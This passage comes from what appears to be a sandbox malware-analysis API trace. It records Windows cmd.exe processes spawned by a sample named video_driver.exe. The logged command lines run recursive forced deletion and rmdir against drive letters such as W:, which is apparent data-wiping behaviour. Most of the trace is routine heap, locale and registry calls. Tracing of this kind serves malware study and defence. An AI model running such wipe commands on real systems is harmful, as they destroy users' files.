ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x780d560, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x780d560, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4e5760 [0070.470] FindClose (in: hFindFile=0x4e5760 | out: hFindFile=0x4e5760) returned 1 [0070.470] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0070.470] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0070.470] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0070.470] GetProcessHeap () returned 0x4d0000 [0070.470] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e4c70 | out: hHeap=0x4d0000) returned 1 [0070.471] GetEnvironmentStringsW () returned 0x4e4180* [0070.471] GetProcessHeap () returned 0x4d0000 [0070.471] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb36) returned 0x4e5fa0 [0070.471] FreeEnvironmentStringsW (penv=0x4e4180) returned 1 [0070.471] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0070.471] GetProcessHeap () returned 0x4d0000 [0070.471] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e17c8 | out: hHeap=0x4d0000) returned 1 [0070.471] GetProcessHeap () returned 0x4d0000 [0070.471] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400e) returned 0x4e6ae0 [0070.472] GetProcessHeap () returned 0x4d0000 [0070.472] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa0) returned 0x4e2e50 [0070.472] GetProcessHeap () returned 0x4d0000 [0070.472] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6ae0 | out: hHeap=0x4d0000) returned 1 [0070.472] GetConsoleOutputCP () returned 0x1b5 [0070.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0070.472] GetUserDefaultLCID () returned 0x409 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf9b8, cchData=128 | out: lpLCData="0") returned 2 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf9b8, cchData=128 | out: lpLCData="0") returned 2 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf9b8, cchData=128 | out: lpLCData="1") returned 2 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0070.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0070.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0070.474] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0070.476] GetProcessHeap () returned 0x4d0000 [0070.476] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x20c) returned 0x4e2ef8 [0070.476] GetConsoleTitleW (in: lpConsoleTitle=0x4e2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0070.476] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0070.476] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0070.476] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0070.476] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0070.476] GetProcessHeap () returned 0x4d0000 [0070.476] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x400a) returned 0x4e6ae0 [0070.477] GetProcessHeap () returned 0x4d0000 [0070.477] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4008) returned 0x4eaaf8 [0070.477] GetProcessHeap () returned 0x4d0000 [0070.477] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1a) returned 0x4e57e0 [0070.477] GetEnvironmentVariableW (in: lpName="p IN (\"V", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="CD") returned 13 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="ERRORLEVEL") returned 11 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="CMDEXTVERSION") returned 13 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="CMDCMDLINE") returned 13 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="DATE") returned 12 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="TIME") returned -4 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="RANDOM") returned -2 [0070.477] _wcsicmp (_String1="p IN (\"V", _String2="HIGHESTNUMANODENUMBER") returned 8 [0070.477] GetProcessHeap () returned 0x4d0000 [0070.477] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e57e0 | out: hHeap=0x4d0000) returned 1 [0070.477] GetProcessHeap () returned 0x4d0000 [0070.477] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4eaaf8 | out: hHeap=0x4d0000) returned 1 [0070.477] GetProcessHeap () returned 0x4d0000 [0070.477] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x4008) returned 0x4eaaf8 [0070.478] GetProcessHeap () returned 0x4d0000 [0070.478] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4eaaf8 | out: hHeap=0x4d0000) returned 1 [0070.478] GetProcessHeap () returned 0x4d0000 [0070.478] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e6ae0 | out: hHeap=0x4d0000) returned 1 [0070.478] _wcsicmp (_String1="if", _String2=")") returned 64 [0070.478] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0070.478] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0070.478] _wcsicmp (_String1="IF", _String2="if") returned 0 [0070.478] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0070.478] GetProcessHeap () returned 0x4d0000 [0070.478] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e3110 [0070.478] GetProcessHeap () returned 0x4d0000 [0070.478] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe) returned 0x4dffc0 [0070.479] GetProcessHeap () returned 0x4d0000 [0070.479] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x20) returned 0x4e57e0 [0070.479] GetProcessHeap () returned 0x4d0000 [0070.479] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4e57e0, Size=0x16) returned 0x4e1800 [0070.479] GetProcessHeap () returned 0x4d0000 [0070.479] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e1800) returned 0x16 [0070.479] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0070.480] GetProcessHeap () returned 0x4d0000 [0070.480] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e3170 [0070.480] GetProcessHeap () returned 0x4d0000 [0070.480] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x14) returned 0x4e31d0 [0070.480] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0070.480] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0070.480] GetProcessHeap () returned 0x4d0000 [0070.481] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x12) returned 0x4e31f0 [0070.481] GetProcessHeap () returned 0x4d0000 [0070.481] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x1c) returned 0x4e57e0 [0070.481] GetProcessHeap () returned 0x4d0000 [0070.481] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4e57e0, Size=0x14) returned 0x4e3210 [0070.481] GetProcessHeap () returned 0x4d0000 [0070.481] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e3210) returned 0x14 [0070.481] _wcsicmp (_String1="del", _String2=")") returned 59 [0070.481] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0070.481] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0070.481] _wcsicmp (_String1="IF", _String2="del") returned 5 [0070.481] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0070.481] _wcsicmp (_String1="REM", _String2="del") returned 14 [0070.481] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0070.481] GetProcessHeap () returned 0x4d0000 [0070.481] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e3230 [0070.481] GetProcessHeap () returned 0x4d0000 [0070.482] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x10) returned 0x4dffd8 [0070.482] GetProcessHeap () returned 0x4d0000 [0070.482] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x28) returned 0x4e3290 [0070.483] GetProcessHeap () returned 0x4d0000 [0070.483] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e32c0 [0070.483] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0070.483] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0070.483] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0070.483] GetProcessHeap () returned 0x4d0000 [0070.483] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e3320 [0070.483] GetProcessHeap () returned 0x4d0000 [0070.484] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x44) returned 0x4e3380 [0070.484] GetProcessHeap () returned 0x4d0000 [0070.484] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x14) returned 0x4e33d0 [0070.484] GetProcessHeap () returned 0x4d0000 [0070.484] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4e33d0, Size=0x12) returned 0x4e33d0 [0070.484] GetProcessHeap () returned 0x4d0000 [0070.484] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e33d0) returned 0x12 [0070.484] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0070.484] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0070.485] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0070.485] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0070.485] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0070.485] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0070.485] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0070.486] GetProcessHeap () returned 0x4d0000 [0070.486] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x12) returned 0x4e33f0 [0070.487] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0070.487] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0070.487] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0070.487] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0070.487] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0070.487] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0070.487] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0070.488] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0070.488] GetProcessHeap () returned 0x4d0000 [0070.488] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x58) returned 0x4e3410 [0070.488] GetProcessHeap () returned 0x4d0000 [0070.488] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x14) returned 0x4e3470 [0070.488] GetProcessHeap () returned 0x4d0000 [0070.488] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x20) returned 0x4e57e0 [0070.490] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0070.707] GetFullPathNameW (in: lpFileName="V:", nBufferLength=0x208, lpBuffer=0x1cf6a8, lpFilePart=0x1cf454 | out: lpBuffer="V:\\", lpFilePart=0x1cf454*=0x0) returned 0x3 [0070.708] wcsncmp (_String1="V:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -6 [0070.712] GetFileAttributesW (lpFileName="V:\\" (normalized: "v:")) returned 0xffffffff [0070.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0070.713] _get_osfhandle (_FileHandle=1) returned 0x7 [0070.713] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0070.713] _get_osfhandle (_FileHandle=0) returned 0x3 [0070.713] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0070.713] SetConsoleInputExeNameW () returned 0x1 [0070.713] GetConsoleOutputCP () returned 0x1b5 [0070.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0070.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.714] exit (_Code=0) Process: id = "68" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41aae000" os_pid = "0x6c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0x484 [0072.366] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af944 | out: lpSystemTimeAsFileTime=0x2af944*(dwLowDateTime=0x8f1ca80, dwHighDateTime=0x1d62400)) [0072.366] GetCurrentProcessId () returned 0x6c0 [0072.366] GetCurrentThreadId () returned 0x484 [0072.366] GetTickCount () returned 0x11497cd [0072.366] QueryPerformanceCounter (in: lpPerformanceCount=0x2af93c | out: lpPerformanceCount=0x2af93c*=19249965235) returned 1 [0072.368] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0072.368] __set_app_type (_Type=0x1) [0072.368] __p__fmode () returned 0x770331f4 [0072.368] __p__commode () returned 0x770331fc [0072.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0072.369] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0072.369] GetCurrentThreadId () returned 0x484 [0072.369] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x484) returned 0x60 [0072.370] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0072.370] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0072.370] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.371] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0072.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af8d4 | out: phkResult=0x2af8d4*=0x0) returned 0x2 [0072.371] VirtualQuery (in: lpAddress=0x2af90b, lpBuffer=0x2af8a4, dwLength=0x1c | out: lpBuffer=0x2af8a4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0072.371] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af8a4, dwLength=0x1c | out: lpBuffer=0x2af8a4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0072.371] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af8a4, dwLength=0x1c | out: lpBuffer=0x2af8a4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0072.371] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af8a4, dwLength=0x1c | out: lpBuffer=0x2af8a4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0072.371] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af8a4, dwLength=0x1c | out: lpBuffer=0x2af8a4*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0072.371] GetConsoleOutputCP () returned 0x1b5 [0072.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0072.372] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0072.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0072.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.373] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0072.373] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.373] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.374] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.374] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0072.374] GetEnvironmentStringsW () returned 0x6220f8* [0072.374] GetProcessHeap () returned 0x610000 [0072.374] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x622bd0 [0072.374] FreeEnvironmentStringsW (penv=0x6220f8) returned 1 [0072.375] GetProcessHeap () returned 0x610000 [0072.375] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x621898 [0072.375] GetEnvironmentStringsW () returned 0x6220f8* [0072.375] GetProcessHeap () returned 0x610000 [0072.375] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x6236a8 [0072.375] FreeEnvironmentStringsW (penv=0x6220f8) returned 1 [0072.375] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae844 | out: phkResult=0x2ae844*=0x68) returned 0x0 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x0, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x1, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x1, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x0, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x40, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x40, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.376] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x40, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.376] RegCloseKey (hKey=0x68) returned 0x0 [0072.376] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae844 | out: phkResult=0x2ae844*=0x68) returned 0x0 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x40, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x1, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x1, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x0, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x9, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x4, lpData=0x2ae850*=0x9, lpcbData=0x2ae848*=0x4) returned 0x0 [0072.377] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae84c, lpData=0x2ae850, lpcbData=0x2ae848*=0x1000 | out: lpType=0x2ae84c*=0x0, lpData=0x2ae850*=0x9, lpcbData=0x2ae848*=0x1000) returned 0x2 [0072.377] RegCloseKey (hKey=0x68) returned 0x0 [0072.377] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b72 [0072.377] srand (_Seed=0x5eb34b72) [0072.377] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" [0072.377] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" [0072.378] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0072.465] GetProcessHeap () returned 0x610000 [0072.465] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x6220f8 [0072.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x622100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0072.465] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.465] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.465] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0072.465] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0072.465] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0072.465] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0072.465] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0072.465] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0072.465] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0072.466] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0072.466] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0072.466] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0072.466] GetProcessHeap () returned 0x610000 [0072.466] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622bd0 | out: hHeap=0x610000) returned 1 [0072.466] GetEnvironmentStringsW () returned 0x622310* [0072.466] GetProcessHeap () returned 0x610000 [0072.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xae2) returned 0x624c70 [0072.466] FreeEnvironmentStringsW (penv=0x622310) returned 1 [0072.466] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0072.466] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0072.467] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0072.467] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0072.467] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0072.467] _wcsicmp (_String1="KEYS", 